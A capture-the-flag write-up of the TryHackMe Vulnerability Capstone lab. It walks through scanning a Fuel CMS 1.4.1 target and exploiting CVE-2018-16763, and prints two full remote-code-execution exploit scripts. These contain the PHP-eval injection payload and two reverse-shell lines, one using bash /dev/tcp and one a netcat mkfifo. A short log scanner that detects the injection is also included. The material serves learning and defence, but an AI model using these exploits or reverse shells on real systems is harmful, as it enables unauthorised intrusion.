
THM: Vulnerability Capstone [WriteUp]

Connect to the THM VPN and start the target machine.

Target IP: 10.10.91.158

Assigned (VPN) IP: 10.14.95.66


What is the name of the application running on the vulnerable machine?

What is the version number of this application?

Use rustscan to find the target's open TCP ports:

rustscan -a 10.10.91.158 -r 1-65535 --ulimit 5000

Use nmap to run default-script and service-version scans against the open TCP ports:

nmap -p22,80 -sCV 10.10.91.158

Use curl to fetch the response headers from the target's port 80:

curl -I http://10.10.91.158:80

┌──(root㉿kali)-[/home/kali/Desktop]
└─# curl -I http://10.10.91.158:80
HTTP/1.1 200 OK
Date: Sun, 22 Dec 2024 06:55:13 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Type: text/html; charset=UTF-8

Open the port-80 page in a browser.


What is the number of the CVE that allows an attacker to remotely execute code on this application?

Use searchsploit to search for this CMS:

searchsploit Fuel

  • The output shows that this CMS, Fuel 1.4.1, has a remote code execution vulnerability.

Copy the exploit from searchsploit into the current directory:

searchsploit -m 47138.py

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 47138.py
  Exploit: fuel CMS 1.4.1 - Remote Code Execution (1)
      URL: https://www.exploit-db.com/exploits/47138
     Path: /usr/share/exploitdb/exploits/linux/webapps/47138.py
    Codes: CVE-2018-16763
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/temp/47138.py


What is the value of the flag located on this vulnerable machine? This is located in /home/ubuntu on the vulnerable machine.

View the exploit code:

cat 47138.py
# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1)
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763


import requests
import urllib

url = "http://127.0.0.1:8881"
def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
        xxxx = raw_input('cmd:')
        burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"
        proxy = {"http":"http://127.0.0.1:8080"}
        r = requests.get(burp0_url, proxies=proxy)

        html = "<!DOCTYPE html>"
        htmlcharset = r.text.find(html)

        begin = r.text[0:20]
        dup = find_nth_overlapping(r.text,begin,2)

        print r.text[0:dup]

I tried modifying the code to get a reverse shell directly:

import requests
import urllib

url = "http://10.10.91.158:80"
def find_nth_overlapping(haystack, needle, n):
    start = haystack.find(needle)
    while start >= 0 and n > 1:
        start = haystack.find(needle, start+1)
        n -= 1
    return start

while 1:
        xxxx = 'bash -i >& /dev/tcp/10.14.95.66/1425 0>&1'
        burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27"

        r = requests.get(burp0_url)

        html = "<!DOCTYPE html>"
        htmlcharset = r.text.find(html)

        begin = r.text[0:20]
        dup = find_nth_overlapping(r.text,begin,2)

        print r.text[0:dup]

The attempt failed, so I went to GitHub to look for another exploit:

#!/usr/bin/python3

# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763
# 
# Poc Created by Ac1d (assassin) 



import requests
import sys
import urllib

from requests.sessions import extract_cookies_to_jar

class col:
    HEADER = '\033[95m'
    BLUE = '\033[94m'
    CYAN = '\033[96m'
    GREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    RESET = '\033[0m'
    BLACK = "\033[0;30m"
    RED = "\033[0;31m"
    GREEN = "\033[0;32m"
    BROWN = "\033[0;33m"
    BLUE = "\033[0;34m"
    PURPLE = "\033[0;35m"
    LIGHT_GRAY = "\033[0;37m"
    DARK_GRAY = "\033[1;30m"
    LIGHT_RED = "\033[1;31m"
    LIGHT_GREEN = "\033[1;32m"
    YELLOW = "\033[1;33m"
    LIGHT_BLUE = "\033[1;34m"
    LIGHT_PURPLE = "\033[1;35m"
    LIGHT_CYAN = "\033[1;36m"
    LIGHT_WHITE = "\033[1;37m"
    BOLD = "\033[1m"
    FAINT = "\033[2m"
    ITALIC = "\033[3m"
    UNDERLINE = "\033[4m"
    BLINK = "\033[5m"
    NEGATIVE = "\033[7m"
    CROSSED = "\033[9m"


def banner():
    banner = r"""
 ______         _ _____ ___  ___ _____ 
|  ___|        | /  __ \|  \/  |/  ___|
| |_ _   _  ___| | /  \/| .  . |\ `--. 
|  _| | | |/ _ \ | |    | |\/| | `--. \
| | | |_| |  __/ | \__/\| |  | |/\__/ /
\_|  \__,_|\___|_|\____/\_|  |_/\____/ 
Tested on 1.4                                       
"""
    banner += "Created by Ac1d"
    return col.LIGHT_BLUE + banner + col.RESET


def help():
    banner = col.LIGHT_WHITE + "\n\tMenu\n"
    banner += col.LIGHT_GREEN
    banner += "\nexit     -\tExit app"
    banner += "\nshell_me -\tGet a reverse shell (netcat) "
    banner += "\nhelp     -\tShow this help\n"+ col.RESET
    return banner
    


print(banner())
print(help())

#http://10.10.12.27/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a(%27ls%20-la%27)%2B%27

if len(sys.argv) != 2:
    print("\nUsage: ./fuleCMS IPADDRESS")
    sys.exit(0)

IP=sys.argv[1]

def parsePage(page):
    try:            
        page = page.split("<h4>A PHP Error was encountered</h4>")[0]
        page = page.split("<div")[0]
        page = page[6:]
        return page
    except:
        return False

try:
        
    while True:
        cmd = input(col.LIGHT_WHITE +"fuelCMS$ " + col.RESET)

        if cmd[0:4].lower() == "exit":
            print(col.RED + "Exiting..." + col.RESET)
            sys.exit(0)

        if cmd[0:8] == "shell_me":
            IP2, PORT = input(col.LIGHT_BLUE + "Enter IP:PORT $ " + col.RESET).split(":")
            nc = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {IP2} {PORT} >/tmp/f"
            cmd = nc
            print(col.LIGHT_GREEN + "\nHope you had your listener ready!!" + col.RESET)
            
        if cmd[0:4] == "help":
            print(help())
            continue
        
        if not "/tmp/f;mkfifo" in cmd:
            print(col.LIGHT_GRAY + "Sending request." + col.RESET)
        cmd = urllib.parse.quote(cmd)
        r = requests.get(f"http://{IP}/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a(%27"+ cmd +"%27)%2B%27")
        if r.status_code == 200:
            page = parsePage(r.text)
            if page == "\n":
                print(col.RED + "No result" + col.RESET)
                continue
            print(col.LIGHT_GREEN+ f"\n{page.strip()}" + col.RESET)

except Exception as e:
    print(col.RED + f"An error occured, please try again...\n\n{e}" + col.RESET)

First, run the script with the target IP:

python fuelCMS.py 10.10.91.158

After entering shell_me, start an nc listener on the local side:

rlwrap -cAr nc -lvnp 1425

After entering the local assigned IP and listening port in the script, the listener receives a connection:

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# rlwrap -cAr nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.14.95.66] from (UNKNOWN) [10.10.91.158] 38980
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
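As an added, defender-side example that is not part of this writeup or of either exploit script: a small Python 3 scanner that reads Apache access-log lines (constructed samples, not from the target), percent-decodes the filter parameter of requests to /fuel/pages/select/, and flags the PHP-eval pattern that CVE-2018-16763 injections carry. The log format, client IPs and timestamps are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-format log lines (assumed format, fictitious clients).
SAMPLE_LOG = """\
10.0.0.5 - - [22/Dec/2024:06:55:13 +0000] "GET /fuel/pages/select/?filter=news HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [22/Dec/2024:06:56:02 +0000] "GET /fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a(%27ls%20-la%27)%2B%27 HTTP/1.1" 200 1830 "-" "python-requests/2.31.0"
10.0.0.9 - - [22/Dec/2024:06:56:40 +0000] "GET /fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27id%27%29%2b%27 HTTP/1.1" 200 1790 "-" "python-requests/2.31.0"
10.0.0.7 - - [22/Dec/2024:06:57:10 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "curl/8.5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# PHP syntax that a legitimate page-filter search string never contains.
EVAL_MARKERS = re.compile(
    r"pi\(|print\(|\$[a-z_]+\s*\(|system|passthru|shell_exec|exec\(", re.I
)


def decode_filter(target):
    """Return the fully decoded 'filter' value of a /fuel/pages/select/ request, else None."""
    parts = urlsplit(target)
    if not parts.path.startswith("/fuel/pages/select"):
        return None
    values = parse_qs(parts.query).get("filter")
    if not values:
        return None
    value = values[0]
    # Decode again until stable so layered percent-encoding cannot hide the payload.
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_log(text):
    """Return one finding per request whose filter closes a quote and injects PHP code."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        filt = decode_filter(m.group("target"))
        if filt is None:
            continue
        if "'" in filt and EVAL_MARKERS.search(filt):
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"), "filter": filt})
    return hits
```

The same check can be applied to live traffic in a WAF or proxy rule: the filter parameter is a plain search string, so a quote followed by a function call is the signature.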

On the target, change to /home/ubuntu and read the flag:

$ cd /home/ubuntu
$ ls
flag.txt
$ cat flag.txt
THM{XXXXX_XXXX_XXXXXX}


http://www.kler.cn/a/448589.html
